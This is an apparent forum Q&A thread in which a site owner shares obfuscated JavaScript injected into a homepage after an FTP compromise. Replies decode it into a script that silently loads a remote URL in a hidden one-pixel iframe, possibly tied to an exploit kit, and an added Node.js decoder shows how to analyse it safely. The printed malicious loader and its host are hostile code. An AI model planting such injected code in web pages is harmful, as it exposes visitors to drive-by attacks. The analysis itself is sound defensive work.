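One of our websites recently had its FTP account compromised, and as a result the attacker injected the JavaScript code below into the site's homepage HTML. I'm comfortable with JavaScript, but I can't make heads or tails of what this code is actually doing. Does anyone else here see what's going on? Injected malicious JavaScript - what does it do?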
p=parseInt;ss=(123)?String.fromCharCode:0;asgq="[email protected][email protected][email protected]!20!3d!20!64!6f!63!7[email protected][email protected][email protected][email protected][email protected][email protected][email protected]!6e!2f[email protected][email protected][email protected][email protected]!6f!6e!20[email protected][email protected]!6c!65!2e[email protected][email protected][email protected][email protected][email protected][email protected][email protected][email protected]!6c!65!2e[email protected][email protected]!6c![email protected]!66!20!28!2[email protected][email protected][email protected][email protected][email protected]!20!7b[email protected][email protected][email protected][email protected][email protected][email protected]!3b!d!a!20!20!20!20!20!20!20!2[email protected][email protected][email protected][email protected][email protected][email protected][email protected][email protected][email protected]!3b".replace(/@/g,"9").split("!");try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=12;if(dbshre){vfvwe=0;try{document;}catch(agdsg){vfvwe=1;}if(!vfvwe){e=eval;}s="";if(zz)for(i=0;i-484!=0;i++){if(window.document)s+=ss(p(asgq[i],16));}if(window.document)e(s);}}
After changing e(s) to console.log(s), I get the following:
(function() {
var fqy = document.createElement('iframe');
fqy.src = 'http://wineloverguide.com/_vti_bin/counter.php';
fqy.style.position = 'absolute';
fqy.style.border = '0';
fqy.style.height = '1px';
fqy.style.width = '1px';
fqy.style.left = '1px';
fqy.style.top = '1px';
if (!document.getElementById('fqy')) {
document.write('<div id=\'fqy\'></div>');
document.getElementById('fqy').appendChild(fqy);
} })();
In one part, I see 'e = eval'. So I suggest changing the final 'e(s)' to 'console.log(s)'. Doing so shows that it creates a '
You, sir, are a genius! Now why did you reply as a comment and not an answer, so I can select it!? – SublymeRick
Also, this may be related to the [Blackhole exploit kit](http://en.wikipedia.org/wiki/Blackhole_exploit_kit), [according to a report](http://urlquery.net/report.php?id=1733469) run on another site affected by a similar incident. – summea
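Swapping `e(s)` for `console.log(s)` still executes the injected script in a browser. As an added example (not code from the original posts), the same encoding can be decoded statically in Node.js, with tokens that are not valid hex reported rather than decoded. `SAMPLE`, `decodePayload` and `triage` are names invented here, and the sample string is constructed.

```javascript
// Static decoder for the "!"-separated hex scheme used by the injected script.
// Nothing is evaluated: the payload is only turned into text and inspected.

// Constructed sample in the same encoding ("9" written as "@", hex bytes
// joined by "!"); it decodes to one harmless line pointing at example.invalid.
const SAMPLE =
  "66!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!65!78!61!6d!70!6c!65!2e!" +
  "6@!6e!76!61!6c!6@!64!2f!63!2e!70!68!70!27!3b!d!a";

// Mirrors asgq.replace(/@/g,"9").split("!") plus the parseInt(x,16) loop.
// `limit` plays the role of the script's hard-coded token count (484).
// Tokens that are not 1-2 hex digits (for example damage introduced when the
// script was copied) are reported in `bad` instead of being decoded.
function decodePayload(encoded, limit = Infinity) {
  const tokens = encoded.replace(/@/g, "9").split("!").slice(0, limit);
  const bad = [];
  let text = "";
  tokens.forEach((tok, index) => {
    if (/^[0-9a-f]{1,2}$/i.test(tok)) {
      text += String.fromCharCode(parseInt(tok, 16));
    } else {
      bad.push({ index, token: tok });
    }
  });
  return { text, bad };
}

// Pulls out what a responder needs from the decoded text: contacted URLs and
// the hidden-iframe traits visible in the decoded script above.
function triage(decoded) {
  return {
    urls: decoded.match(/https?:\/\/[^\s'"<>)]+/g) || [],
    createsIframe: /createElement\(\s*['"]iframe['"]\s*\)/i.test(decoded),
    usesDocumentWrite: /document\.write\s*\(/.test(decoded),
    onePixelFrame: /\.style\.(?:height|width)\s*=\s*['"][01]px['"]/.test(decoded),
  };
}

const result = decodePayload(SAMPLE);
console.log(JSON.stringify(result.text), result.bad, triage(result.text));
```

A non-empty `bad` list means the copy being analysed is incomplete, so the decoded text should be compared against the file as it sits on the server.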